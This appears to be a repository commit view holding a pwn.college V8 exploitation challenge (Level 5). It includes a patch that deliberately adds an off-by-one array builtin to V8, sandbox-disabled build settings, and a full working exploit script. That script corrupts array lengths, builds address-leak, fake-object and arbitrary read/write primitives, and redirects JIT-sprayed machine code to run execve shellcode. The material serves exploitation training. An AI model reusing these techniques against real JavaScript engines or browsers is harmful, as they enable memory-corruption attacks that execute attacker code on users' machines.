bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Moved JavaScript/PwnCollegeV8Exploitation/ to PwnCollege/V8Exploitation/

Browse Source
This commit is contained in:
Jack Ren
2024-09-27 10:32:08 +08:00
parent ed5918f284
commit 41c959a465
52 changed files with 1 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

158
PwnCollege/V8Exploitation/Level5/Exploit.js Normal file
View File

@@ -0,0 +1,158 @@
// Integrated Builtin:
// - Array.prototype.offByOne(...)
// - Read (void)
// - Write (double value)
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab, 0, 1);
let i32a = new Uint32Array(ab, 0, 2);
let si32a = new Int32Array(ab, 0, 2);
let bi64a = new BigUint64Array(ab, 0, 1);
function c2f(low, high) { // combined (two 4 bytes) word to float
i32a[0] = low;
i32a[1] = high;
return f64a[0];
}
function b2f(v) { // bigint to float
bi64a[0] = v;
return f64a[0];
}
function f2b(v) { // float to bigint
f64a[0] = v;
return bi64a[0];
}
function unptr(v) {
return v & 0xfffffffe;
}
function ptr(v) {
return v | 1;
}
function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
}
for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation, too large loop count will trigger TURBOFAN
let offByOneArr = [1.1];
let corrupted_obj = {inline: 1};
corrupted_obj.outofline1 = 2;
corrupted_obj.outofline2 = 3;
let corrupted_obj_map_properties = offByOneArr.offByOne();
f64a[0] = corrupted_obj_map_properties;
let corrupted_obj_properties_addr = i32a[1];
console.log("addrof(corrupted_obj.properties) = ", corrupted_obj_properties_addr.toString(16));
let offByOneArr_addr = corrupted_obj_properties_addr - 0x7c;
console.log("addrof(offByOneArr) = ", offByOneArr_addr.toString(16));
i32a[1] = offByOneArr_addr;
offByOneArr.offByOne(f64a[0]); // Replace corrupted_obj.properties with offByOneArr
corrupted_obj.outofline2 = 0x1000_0000; // offByOneArr.length
if (offByOneArr.length !== 0x1000_0000) {
throw new Error("offByOneArr.length corrupt failed!");
}
// %DebugPrint(offByOneArr);
// %DebugPrint(corrupted_obj);
// %SystemBreak();
let placeholder = {};
let corrupt_arr = [2.30234590962020889586281057477E-320];
let double_arr = [1.09366371363418335018925267989E-319];
let obj_arr = [placeholder];
f64a[0] = offByOneArr[0x150 / 8];
i32a[0] = 0x1000 << 1; // corrupt_arr.length
offByOneArr[0x150 / 8] = f64a[0];
if (corrupt_arr.length !== 0x1000) {
throw new Error("corrupt_arr.length corrupt failed!");
}
// %DebugPrint(corrupt_arr);
// %DebugPrint(double_arr);
// %DebugPrint(obj_arr);
// %SystemBreak();
const corrupt_arr_0_to_obj_arr_0_offset = 13;
const corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD = 1;
function GetAddressOf(obj) {
obj_arr[0] = obj;
f64a[0] = corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset];
return unptr(i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD]);
}
function GetFakeObject(addr) {
f64a[0] = corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset];
let old_obj_addr = i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD];
i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD] = ptr(addr);
corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset] = f64a[0];
let faked_obj = obj_arr[0];
i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD] = old_obj_addr;
corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset] = f64a[0];
return faked_obj;
}
const corrupt_arr_0_to_double_arr_element_offset = 4;
// QWORD Aligned
function ArbRead64(cage_addr) { // int32
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
let result = f2b(double_arr[0]);
console.log(`ArbRead64 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// QWORD Aligned
function ArbWrite64(cage_addr, value) { // int32, bigint
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
let written = b2f(value);
double_arr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
// DWORD Aligned
function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
let shellcode_addr = GetAddressOf(shellcode);
console.log("Address of shellcode: " + shellcode_addr.toString(16));
// %DebugPrint(shellcode);
// %SystemBreak();
let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
console.log("Address of code: " + code_addr.toString(16));
// %DebugPrintPtr(code_addr + 0x1);
// %SystemBreak();
let instruction_start_addr = code_addr + 0x14;
let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode();

14
PwnCollege/V8Exploitation/Level5/README.md Normal file
View File

@@ -0,0 +1,14 @@
# Level 5
## Problem
Given a vulnerability which can OffByOne Read/Write an double array.
## Key Knowledge
- Heap Fengshui
- Some inspiration to corrupt array's length
- This is an open-ended question, so use your imagination!
`Exploit.js` is only one of the possible answers. Don't be bound by it.
Find out some brand-new ways using your own mind!

1
PwnCollege/V8Exploitation/Level5/REVISION Normal file
View File

@@ -0,0 +1 @@
5a2307d0f2c5b650c6858e2b9b57b335a59946ff

10
PwnCollege/V8Exploitation/Level5/args.gn Normal file
View File

@@ -0,0 +1,10 @@
is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false

127
PwnCollege/V8Exploitation/Level5/patch Normal file
View File

@@ -0,0 +1,127 @@
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index ea45a7ada6b..4ed66c8113f 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -407,6 +407,46 @@ BUILTIN(ArrayPush) {
return *isolate->factory()->NewNumberFromUint((new_length));
}
+BUILTIN(ArrayOffByOne) {
+ HandleScope scope(isolate);
+ Factory *factory = isolate->factory();
+ Handle<Object> receiver = args.receiver();
+
+ if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast<JSArray>(*receiver))) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Nope")));
+ }
+
+ Handle<JSArray> array = Cast<JSArray>(receiver);
+
+ ElementsKind kind = array->GetElementsKind();
+
+ if (kind != PACKED_DOUBLE_ELEMENTS) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Need an array of double numbers")));
+ }
+
+ if (args.length() > 2) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Too many arguments")));
+ }
+
+ Handle<FixedDoubleArray> elements(Cast<FixedDoubleArray>(array->elements()), isolate);
+ uint32_t len = static_cast<uint32_t>(Object::NumberValue(array->length()));
+ if (args.length() == 1) { // read mode
+ return *(isolate->factory()->NewNumber(elements->get_scalar(len)));
+ } else { // write mode
+ Handle<Object> value = args.at(1);
+ if (!IsNumber(*value)) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Need a number argument")));
+ }
+ double num = static_cast<double>(Object::NumberValue(*value));
+ elements->set(len, num);
+ return ReadOnlyRoots(isolate).undefined_value();
+ }
+}
+
namespace {
V8_WARN_UNUSED_RESULT Tagged<Object> GenericArrayPop(Isolate* isolate,
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 78cbf8874ed..8a0bd959a29 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -394,6 +394,7 @@ namespace internal {
ArraySingleArgumentConstructor) \
TFC(ArrayNArgumentsConstructor, ArrayNArgumentsConstructor) \
CPP(ArrayConcat) \
+ CPP(ArrayOffByOne) \
/* ES6 #sec-array.prototype.fill */ \
CPP(ArrayPrototypeFill) \
/* ES7 #sec-array.prototype.includes */ \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index 9a346d134b9..ce31f92b876 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1937,6 +1937,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
return Type::Receiver();
case Builtin::kArrayUnshift:
return t->cache_->kPositiveSafeInteger;
+ case Builtin::kArrayOffByOne:
+ return Type::Receiver();
// ArrayBuffer functions.
case Builtin::kArrayBufferIsView:
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
+/* global_template->Set(Symbol::GetToStringTag(isolate),
String::NewFromUtf8Literal(isolate, "global"));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
global_template->Set(isolate, "readline",
FunctionTemplate::New(isolate, ReadLine));
global_template->Set(isolate, "load",
- FunctionTemplate::New(isolate, ExecuteFile));
+ FunctionTemplate::New(isolate, ExecuteFile));*/
global_template->Set(isolate, "setTimeout",
FunctionTemplate::New(isolate, SetTimeout));
// Some Emscripten-generated code tries to call 'quit', which in turn would
// call C's exit(). This would lead to memory leaks, because there is no way
// we can terminate cleanly then, so we need a way to hide 'quit'.
- if (!options.omit_quit) {
+/* if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
if (i::v8_flags.expose_async_hooks) {
global_template->Set(isolate, "async_hooks",
Shell::CreateAsyncHookTemplate(isolate));
- }
+ }*/
return global_template;
}
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index 48249695b7b..99dc014c13c 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -2533,6 +2533,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
true);
+ SimpleInstallFunction(isolate_, proto, "offByOne",
+ Builtin::kArrayOffByOne, 1, false);
SimpleInstallFunction(isolate_, proto, "concat",
Builtin::kArrayPrototypeConcat, 1, false);
SimpleInstallFunction(isolate_, proto, "copyWithin",